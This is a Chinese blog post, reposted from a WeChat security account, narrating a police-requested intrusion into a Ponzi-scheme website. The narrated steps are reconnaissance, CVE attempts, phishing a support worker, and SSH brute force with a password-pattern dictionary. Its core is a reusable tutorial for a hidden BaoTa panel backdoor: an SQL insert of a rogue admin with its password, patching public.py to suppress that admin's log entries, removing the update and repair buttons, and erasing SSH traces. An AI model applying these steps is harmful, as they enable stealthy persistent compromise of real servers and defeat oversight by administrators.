记一次资金盘定向电子取证全过程

免责声明

由于传播、利用本公众号"零漏安全"所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号"零漏安全"及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢！文章转载与T00ls其他师傅文章

一、故事背景&前提 |

应当地经侦邀请，参与对某资金盘采取定向电子取证。
资金盘是什么，这里就不介绍了，问股沟。资金盘的特性可能没有接触过的看官老爷们不太了解。
资金盘属于“深网”，和我们一般接触的“表网”网站不同，他需要用户名和密码才能进到别有洞天之处。
否则就是这样，开局一张图，该藏全隐藏。

注册帐号也是必须要有“邀请码”（你们联想到了什么？/手动坏笑）。既然是GA哥哥邀请，那么帐号
的问题自然解决了。

资金盘涉及的几个关键身份为：项目方、工程方、团队长、会员

项目方：就是发起该资金盘的人或组织，以骗取公民钱财为目的。
工程方：即为各所谓信息软件公司，负责设计开发、运维。通常收取少量费用，并以入股形式占比该
资金盘。（帮助项目方骗取人民钱财，属违法行为）

团队长：因各资金盘都有“拉人头”的佣金，部分有人脉的人会选择帮助项目方发展会员赚取佣金。（亦是违法行为）

会员： 

整个资金盘就是由项目方以各种“一夜暴富”、“心灵鸡汤”卖着春药，团队长拼命拉皮条，工程方负责技术支持。收割韭菜。
二、信息搜集
1.APP使用在线分发系统，下载后通过fiddler抓包，获得域名：*******.****yx.cn；

2.站长、微步、censys等各类在线whois工具获得目标服务器IP：47.xx.xxx.xxx(杭州阿里云)；
3.nmap一波，端口22（ssh），53（domain），80（http/nginx），8888（老朋友宝塔），OS：Linux 3.X|4.X|5.X |
4.通过刚才的登录页favicon看到源码使用的CRMEB模版二开。（CRMEB是基于Thinkphp框架二开的框架）
三、故事开始
1.xray跑一波。深网特性，自然毫无收获。
2.既然CRMEB基于Thinkphp开发，自然payload也要打上一波，无果。

3.CRMEB的上传漏洞，CVE-2020-21787尝试一下，失败。

浏览了一遍简简单单的几个h5页面，也没有发现注入点，XSS被转义。在线客服为第三方名厂外链，没有攻击面。由于资金盘业务通常都非常简单，nmap可以看到只开了几个常规服务端口。并且工程方会为各个项目单独开设VPS搭建，不存在旁站
此处陷入僵局......hydra ssh先跑着吧.... -
四、柳暗花明
通过在线客服系统和客服聊了3天，发现是个妹子。社工啊社工，最终成功让小姐姐点了钓鱼页。获得了后台帐号密码。
不宜迟。成功登录后台发现CRMEB版本较新，难怪不存在CVE-2020-21787。
浏览了一下简简单单的几个功能，发现在“维护”-“安全维护”里竟然有“文件管理”功能。可以浏览，甚至编辑网站根目录下所有文件。那想什么呢，找个php写个一句话完事呗。

不，没那么简单，也不知道是源码问题还是设置了权限（后面看到是工程方设置了权限）。编辑后无法保存文件。
那就看看.env先，这里保存着数据库配置和一些其他信息。数据库信息到手。

采用站库分离，navicat连接数据库。无法连接，应该是设置了指定IP组访问。
那么....怎么就柳暗花明了呢？
通常工程方为了好记，对相关项目都会使用同样的账户、密码的设置规则。以数据库配置为例，数据库用户、库名都采用的项目
名称的拼音，而密码使用项目名称拼音简写+年份+特殊符。
根据这个规则建字典，hydra打ssh。Bingo~~芜湖起飞~~~~-

你以为这就完了？我是靠着运气来水贴的？不你错了！后面才是干货分享
留后门的方式千千万，对于我这样的懒人既然工程方装了宝塔，那自然是要幸福你我他的。
分享一个留宝塔后门的方法
一、下载宝塔数据库文件 /www/server/panel/data/default.db
二、用工具打开，这里推荐DB Browser for SQLite，有windows版，kali自带。

logs表里看到管理员正在干活。。。。火速擦擦ssh的痕迹，等一个月黑风高夜。
三、插入一个新的宝塔管理员
在“执行SQL”选项卡里粘贴

INSERT INTO users (id,username,password,login_ip,login_time,phone,email,salt) 
VALUES (2,"adminpo","ea1b5465b975ffdbe9e0df05fc0f5dca",0,0,0,"[email protected]","Vf0JoGbf4wg5");

并运行。之后选择“保存写入更改”。T

这样，我们就添加了一个名为adminpo，密码为951753afj; 的管理员帐号。
四、将default.db回传并覆盖原数据库。
五、修改宝塔日志记录的python
找到/www/server/panel/class/public.py，ctrl+F定位Writelog -
在result = sql.table('logs').add('uid,username,type,log,addtime',data) 前加 if uid!=2:空格

六、修改宝塔index页面
因为宝塔首页上方bannar有“更新”、“修复”功能，一旦对方使用该功能，我们的尾巴就又露出来了。

找到/www/server/panel/BTPanel/templates/default/index.html，删除87,88行。（一般人不会在意少了这2个按钮：））

七、重要的一步，切勿忘记！需要重启宝塔面板。

自此，一个隐藏的宝塔面板管理员就做好了，不会有任何记录。方便，好用

取证
可别忘了咱来干嘛的，打包源码、导出数据库，宝塔绑定手机号获取，宝塔登录IP记录，后台管理员登录IP记录，数据库被靠前且活跃的会员手机号（多半是项目方）。一套行云流水的记录，打包发GA哥哥。完事儿~为民除害的事儿就交给他们吧。
珍爱生命，远离资金盘；
正义可能迟到，但绝不会缺席！

长按二维码识别关注

原文始发于微信公众号（零漏安全）：记一次资金盘定向电子取证全过程